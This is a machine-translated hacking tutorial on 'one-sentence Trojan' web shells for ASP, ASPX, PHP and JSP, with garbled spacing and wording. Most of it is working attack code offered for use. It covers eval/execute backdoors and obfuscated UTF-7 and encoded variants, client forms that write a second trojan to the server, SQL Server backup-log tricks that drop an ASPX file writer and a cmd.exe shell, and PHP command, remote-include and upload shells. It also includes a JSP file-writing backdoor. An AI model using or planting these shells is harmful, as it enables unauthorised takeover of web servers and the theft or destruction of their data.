Analysis on the principle and utilization of a Single-sentence Trojan (asp, aspx, php, jsp)

Applicable environment of one-sentence Trojan:
1. the Guest account on the server has the write permission
2. The database address is known and the database format is asa or asp
3. If the database format is not asp or asa, you can insert a sentence to the asp file.
Principle of one-sentence Trojan:
"One-sentence Trojan" server (local html file submission)
This is the asp statement we want to use to insert to an asp file (not just a database file suffixed with asp). This statement will be triggered back to receive data submitted by intruders through the client, execute and complete the corresponding operation. The server code content is <% execute request ("value") %> where value can be modified by yourself.
"One-sentence Trojan" client (asp file inserted with one sentence on the remote server)
Used to submit control data to the server. The submitted data is used to form and execute complete asp functional statements through the server, that is, to generate the asp Trojan file we need.
Now let's assume that the TEXT in the remote host is. ASP (client) already has the <% execute request ("value") %> statement .) in ASP, <% execute ............ ") %> indicates executing the statement in the ellipsis. if I write a statement that we have carefully constructed, it will also help us to execute it. based on the above ideas, we can construct a local form with the following content: (// annotation)
<Form action = http: // host path/TEXT. asp method = post>
<Textarea name = value cols = 120 rows = 10 width = 45>
Set lP = server. createObject ("Adodb. Stream") // create a Stream object
LP. Open // Open
LP. Type = 2 // in text format
LP. CharSet = "gb2312" // font Standard
LP. writetext request ("newvalue ")
LP. SaveToFile server. mappath ("newmm. asp"), 2 // write the trojan content into newmm. asp by overwriting the file, and 2 by overwriting.
LP. Close // Close the object
Set lP = nothing // release the object
Response. redirect "newmm. asp" // switch to newmm. asp
</Textarea>
<Textarea name = newvalue cols = 120 rows = 10 width = 45> Add the trojan content </textarea>
<Center> <br>
<Input type = submit value = submit>
</Form>
The form is used to submit the content in the form to the TEXT of the remote host. ASP file. then, because of TEXT. ASP contains the <% execute request ("value") %> sentence, so this code will execute the content we sent from the form. (The form name must be the same as the value in <% execute request ("VALUE") %>, which is the two places marked in blue and must be equal)
Are you clear about this. we constructed two forms. The code in the first form is the code for file operations (that is, the content in the second form is written to the current directory and named newvalue. the second form is, of course, the trojan we want to write.
The specific section is as follows:
Set lP = server. createObject ("Adodb. Stream") // create a Stream object
LP. Open // Open
LP. Type = 2 // in text format
LP. CharSet = "gb2312" // font Standard
LP. writetext request ("newvalue ")
LP. SaveToFile server. mappath ("newvalue. asp"), 2 // write the trojan content into newmm. asp by overwriting the file, and 2 by overwriting.
LP. Close // Close the object
Set lP = nothing // release the object
Response. redirect "newmm. asp" // switch to newmm. asp
In this case, the name of the second form must be the same as newvalue in lP. writetext request ("Newvalue"), which is the two parts marked in red.
So far, as long as the server has the write permission, the content of the Trojan submitted by your form will be written to newmm. asp. Newmm. asp is our shell address.
Http://www.hxhack.com/bbs
Server errors:
Often, when we add a sentence to an asp file, the Type Mismatch Error will occur:
Script error detected at line 1.
Source line: execute request ("nettoo ")
Description: Type Mismatch: 'execute'
How can this problem be solved?
I have come up with a good solution. If I replace the "execute" server with "eval", there will be no errors!
Connect to the client in one sentence and add a fault tolerance statement. You can insert it into any ASP file without making any mistakes as before.
<% On Error Resume Next execute request ("value") %>
Variants of common asp statement Trojans:
<% Set MS = server. CreateObject ("MSScriptControl. ScriptControl.1 ")
Ms. Language = "VBScript"
Ms. AddObject "Response", Response
Ms. AddObject "request", request
Ms. AddObject "session", session
Ms. AddObject "server", server
Ms. AddObject "application", application
Ms. ExecuteStatement ("ex" & "ecute (request (chr (35)") %>

<% ExecuteGlobal request (chr (35) %>
<% ExecuteGlobal request (chr (35) %>
<% Execute request ("#") %>
<% Execute request (chr (35) %>
<Script language = VBScript runat = server> if request (chr (35) <> "" then
ExecuteGlobal request (chr (35 ))
</Script>
<% ExecuteGlobal request (chr (35) %> September 30
<% Eval request ("#") %>
Insert in Database
When the number of bytes is increased
Utf-7 horse
<% @ Codepage = 65000%>
<% Response. Charset = "936" %>
<% E + j-x + j-e + j-c + j-u + j-t + j-e + j-(+ j-r + j-e + j-q + j-u + j-e + j-s + j-t + j-(+ j-+ ACI-# + ACI) + j-) + j-%>

<% Set MS = server. CreateObject ("MSScriptControl. ScriptControl.1 ")
Ms. Language = "VBScript"
Ms. AddObject "Response", Response
Ms. AddObject "request", request
Ms. AddObject "session", session
Ms. AddObject "server", server
Ms. AddObject "application", application
Ms. ExecuteStatement ("ex" & "ecute (request (chr (35)") %>
<% @ LANGUAGE = VBScript. Encode %>
<% #@~ ^ PgAAAA = r6P .;! +/D '14dv & X #*@! @ * ErPPD4 + P2Xn ^ ED + VVG4Cs, Dn ;! N/D '^ 4m' & Xb * oBMAAA = ^ #~ @ %>

One-sentence trojan in various environments:
Aspx
1. A Trojan equivalent to ASP:
Program code
Alter database pubs set recovery full --
Create table pubs. dbo. cmd (a image)
Backup log pubs to disk = 'C: \ TM 'with init
Insert into pubs. dbo. cmd (a) values ('<% @ Page Language = "C #" validateRequest = "false" %> <% System. IO. streamWriter ow = new System. IO. streamWriter (Server. mapPath ("images. aspx "), false); ow. write (Request. params ["l"]); ow. close () %> ')
Backup log pubs to disk = 'd: \ test11.aspx'
// This is the same as asp. The client post a variable l and leaves the trojan code in the variable l. This is an asp-like one-sentence Trojan.
// Mu.aspx.htm client: (access after submission: http: // IP/images. aspx)
<Form action = http: // 192.168.2.100/asp/mu. aspx method = post>
<B> enter the following content: </B> <br>
<Textarea name = l cols = 120 rows = 35 width = 45>
<% @ Page Language = "VB" Debug = "true" %>
<% @ Import Namespace = "system. IO" %>
<% @ Import Namespace = "System. Diagnostics" %>
<Script runat = "server">
Sub RunCmd (Src As Object, E As EventArgs)
Dim myProcess As New Process ()
Dim myProcessStartInfo As New ProcessStartInfo (xpath. Text)
MyProcessStartInfo. UseShellExecute = False
MyProcessStartInfo. RedirectStandardOutput = true
MyProcess. StartInfo = myProcessStartInfo
MyProcessStartInfo. Arguments = xCmd. text
MyProcess. Start ()
Dim myStreamReader As StreamReader = myProcess. StandardOutput
Dim myString As String = myStreamReader. Readtoend ()
MyProcess. Close ()
Mystring = replace (mystring, "<", "<")
Mystring = replace (mystring, ">", "> ")
Result. text = vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</Script> <Title> ASP. NET Shell for WebAdmin2.X Final </title>
<Meta http-equiv = "Content-Type" c/> <Form runat = "server">
<Asp: Label id = "L_p" style = "COLOR: # 0000ff" runat = "server" width = "80px">; Program </asp: Label>
<Asp: TextBox id = "xpath" style = "BORDER-RIGHT: # 084b8e 1px solid; BORDER-TOP: # 084b8e 1px solid; BORDER-LEFT: # 084b8e 1px solid; BORDER-BOTTOM: # 084b8e 1px solid "runat =" server "Width =" 300px "> c: \ windows \ system32 \ cmd.exe </asp: TextBox> <br/>
<Asp: Label id = "L_a" style = "COLOR: # 0000ff" runat = "server" width = "80px"> Arguments </asp: Label>
<Asp: TextBox id = "xcmd" style = "BORDER-RIGHT: # 084b8e 1px solid; BORDER-TOP: # 084b8e 1px solid; BORDER-LEFT: # 084b8e 1px solid; BORDER-BOTTOM: # 084b8e 1px solid "runat =" server "Width =" 300px "Text ="/c net user ">/c net user </asp: textBox> <br/>
<Asp: Button id = "Button" style = "BORDER-RIGHT: # 084b8e 1px solid; BORDER-TOP: # 084b8e 1px solid; BORDER-LEFT: # 084b8e 1px solid; COLOR: # ffffff; BORDER-BOTTOM: # 084b8e 1px solid; BACKGROUND-COLOR: #719bc5 "runat =" server "Width =" 100px "Text =" Run "> </asp: Button> <p>
<Asp: Label id = "result" style = "COLOR: # 0000ff" runat = "server"> </asp: label> </p> </form> </body> </Textarea>
<Center> <br>
<Input type = submit value = submit>
2. Here is the file upload program for my online asp.net. You can also use it after the modification is simplified:
Program code
Drop table pubs. dbo. cmd
Alter database pubs set RECOVERY FULL
Create table pubs. dbo. cmd (a image)
Backup log pubs to disk = 'C: \ TM 'with init
Insert into pubs. dbo. cmd (a) values ('<script language = "c #" runat = "server"> private void bc (object o, EventArgs e) {string u = "files "; string filename; int pos = f. postedFile. fileName. lastIndexOf ("\"); filename = f. postedFile. fileName. substring (pos + 1); f. postedFile. saveAs (Server. mapPath (u) + "\" + filename );} </script> <form method = "post" runat = "server"> <input type = "file" id = "f" runat = "server"/> <input type = "submit" value = "ss" runat = "Server"/> </form> ')

Backup log pubs to disk = 'C: \ inetpub \ wwwroot \ test11.aspx'

PHP
There is nothing special in this article. I just want to discuss it. And sent it to my friends who were wandering at the PHP door like me.
Just a few days after I learned PHP, I was eager to succeed. Therefore, Please actively point out errors and shortcomings.
Powerful PHP syntax is beyond the reach of ASP, only one: <? Phpinfo ();?> The configuration of the entire server can be tapped. Running cmd and uploading files are very simple. Currently, the PHP Trojan is better than phpspy of angel. Yesterday, hak_ban asked me how to encrypt the PHP Trojan. I did not expect it, but it is still very difficult for me to write a micro-PHP Trojan.
Here we will briefly discuss several functions that can be used as Trojans:
1. Several functions that can run external commands: system, passthru, exec, shell_exec, and popen.
For example, you only need to <? System ($ cmd);?> And can be used to run external commands. These functions can be said to be the earliest micro-row php Trojan, so the General Virtual Host settings will also block these functions.
2. Do you still remember the style. php vulnerability in the WDB forum? We can use this Trojan to make it difficult to be killed. As follows:
<? Php include ($ include);?>
Save it as 1.php, we can call other. php Trojans (such as phpspy. php) that do not support the php server to achieve our goal: http://target.com/1.php? Include = http://www.xxx.com/phpspy.php
The http://www.918x.com here does not support php, otherwise it will run phpspy. php on the http://www.xxx.com server, not the target server.
3. This is a very good upload trojan that angel gave us in Discuz 2.2F attacks. I didn't change it:
<? Copy ($ _ FILES [MyFile] [tmp_name], $ _ FILES [MyFile] [name]);?>
Save it as up. php and submit the form locally:
<Form ENCTYPE = "multipart/form-data" ACTION = "http: // target server/up. php" METHOD = "POST">
<Input NAME = "MyFile" TYPE = "file">
<Input VALUE = "submit" TYPE = "submit">
</Form>
You can upload a large php Trojan.
4. I have been wondering if there is a PHP trojan that is submitted to run through a local form like the ASP Trojan of the ice Fox prodigal son. Finally, I found the function: eval. In the PHP4 Chinese Reference Manual, its syntax is described as follows:
Syntax: void eval (string code_str );
Description: This function can be used to substitute variable values in strings for processing database data. The code_str parameter is the string to be processed. Note that the string to be processed must conform to the PHP string format and contain a semicolon at the end. The strings processed using this function are continued until the end of the PHP program.
We can save it on the target host: <? Eval ($ cmd);?> Is a PHP file (I want to insert it into any PHP file ). Then, the local commit is used to achieve the goal. However, unlike ASP, when magic_quotes_gpc = on, many characters are filtered, which greatly reduces the usage of this function.
I have done this PHP Trojan local form many times and there is no mature code yet. Please advise. After writing it, we will dedicate it to you. However, the eval function can be used as a micro-PHP Trojan without any doubt.
Ps: After writing the script, someone told me that the master had already had a micro-PHP Trojan, but it was not made public. Ah, I am so depressed. I have studied the results that people have already achieved. In any case, I would like to share my research with you, hoping to get help and advice.

JSP
<%
If (request. getParameter ("f ")! = Null) (new java. io. fileOutputStream (application. getRealPath ("\") + request. getParameter ("f "))). write (request. getParameter ("t "). getBytes ());
%>
I don't need to talk about this backdoor. I 'd like to remind you. Save it as 1.jsp and submit the url!
Http: // localhost/1.jsp? F00001.txt & t = hello
Then: http: // localhost/1.txt, the content is hello .....
Summary --- Transfer